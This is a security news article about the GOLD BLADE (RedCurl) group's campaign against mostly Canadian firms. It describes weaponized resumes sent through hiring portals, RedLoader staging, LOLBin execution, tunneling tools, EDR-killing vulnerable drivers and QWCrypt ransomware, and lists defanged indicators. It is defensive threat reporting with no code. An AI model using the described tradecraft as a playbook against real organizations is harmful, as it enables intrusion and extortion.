GOLD BLADE Exploiting Custom QWCrypt Locker for Data Exfiltration and Ransomware Deployment - cyberpress.org

GOLD BLADE Exploiting Custom QWCrypt Locker for Data Exfiltration and Ransomware Deployment By Priya December 9, 2025 Categories: Cyber Security NewsRansomware Between February 2024 and August 2025, Sophos threat analysts identified nearly 40 intrusions linked to campaign STAC6565, attributed with high confidence to the GOLD BLADE threat group also tracked as RedCurl, RedWolf, and Earth Kapre. Once known for espionage operations, GOLD BLADE has evolved into a hybrid actor that combines data theft, credential harvesting, and selective ransomware deployment using its proprietary QWCrypt locker. Nearly 80% of the campaign’s targets were Canada-based organizations, primarily in the services, manufacturing, retail, and technology sectors. The group has shifted from classic spearphishing to a novel social engineering tactic that exploits recruitment platforms such as Indeed, JazzHR, and ADP WorkforceNow. Instead of sending malicious emails, attackers upload weaponized resumes as PDFs directly to recruitment portals, exploiting HR departments’ trust in these systems. Upon viewing the documents, victims are redirected to fake “Safe Resume Share Service” pages that serve RedLoader malware, initiating a multi-stage compromise. Multi-Stage RedLoader Chain and BYOVD Evasion The RedLoader infection chain observed by Sophos evolved through three stages: initial execution, secondary payload deployment, and final installation. Early variants employed .lnk and .iso delivery methods, while later attacks in 2025 combined remote DLL sideloading hosted on Cloudflare Workers domains (e.g., automatinghrservices[.]workers[.]dev). Each stage used browser-themed scheduled tasks to deploy payloads and maintain persistence, utilizing living-off-the-land binaries such as pcalua.exe for stealth execution. GOLD BLADE targeting by sector from February 2024 through August 2025 To maintain command and control, GOLD BLADE leveraged open-source RPivot and Chisel tunneling tools, establishing SOCKS proxies to C2 servers hosted on Cloudflare Workers and external IP infrastructure. Defense evasion employed a Bring Your Own Vulnerable Driver (BYOVD) technique, using modified Zemana AntiMalware drivers and customized Terminator utilities to disable EDR/XDR protections. Analysts discovered unique build paths in Terminator samples, revealing an organized ransomware toolkit and operational structure. In April and July 2025, GOLD BLADE executed QWCrypt ransomware deployments following data exfiltration. Delivered via encrypted 7-Zip archives, the ransomware appended .qwCrypt extensions and dropped ransom notes akin to LockBit styles. While Sophos CryptoGuard protected against many attacks, unprotected endpoints offered limited encryption. The incident demonstrated GOLD BLADE’s strategic ability to alternate between espionage-for-hire and direct financial extortion. Sophos detections for this campaign include Troj/Agent-BLEI, Troj/Ransom-HHH, and CXmal/KillAV-ZA. Key indicators include multiple Cloudflare Workers C2 domains, IP 109[.]206[.]236[.]209, and confirmed QWCrypt hashes such as 568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db. Organizations are advised to sandbox incoming resumes, strengthen endpoint monitoring, and deploy managed detection and response (MDR) solutions to detect evolving GOLD BLADE techniques. Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates Share Facebook Twitter Pinterest WhatsApp Priya Priya is a Security Reporter who tracks malware campaigns, exploit kits, and ransomware operations. Her reporting highlights technical indicators and attack patterns that matter to defenders Recent Articles New Progress ShareFile Vulnerabilities Enable Server Takeover with No Login Required Cyber Security News April 3, 2026 Microsoft Pushes Forced Upgrade to Windows 11 Version 24H2 for Unmanaged PCs Cyber Security News April 3, 2026 Infrastructure Engineer Pleads Guilty to Locking 254 Company Windows Servers Cyber Security News April 3, 2026 CISA Adds TrueConf Flaw to KEV Catalog Amid Active Exploitation Cyber Security News April 3, 2026 14,000+ F5 BIG-IP APM Instances Exposed as RCE Exploits Surge Cyber Security News April 3, 2026 Related Stories Cyber Security News New Progress ShareFile Vulnerabilities Enable Server Takeover with No Login Required AnuPriya - April 3, 2026 Cyber Security News Microsoft Pushes Forced Upgrade to Windows 11 Version 24H2 for Unmanaged PCs AnuPriya - April 3, 2026 Cyber Security News Infrastructure Engineer Pleads Guilty to Locking 254 Company Windows Servers AnuPriya - April 3, 2026 Cyber Security News CISA Adds TrueConf Flaw to KEV Catalog Amid Active Exploitation AnuPriya - April 3, 2026 Cyber Security News 14,000+ F5 BIG-IP APM Instances Exposed as RCE Exploits Surge AnuPriya - April 3, 2026 Cyber Attack Axios Maintainer Says npm Compromise Stemmed From Targeted Social Engineering Varshini - April 3, 2026 LEAVE A REPLY Comment: Name:* Email:* Website: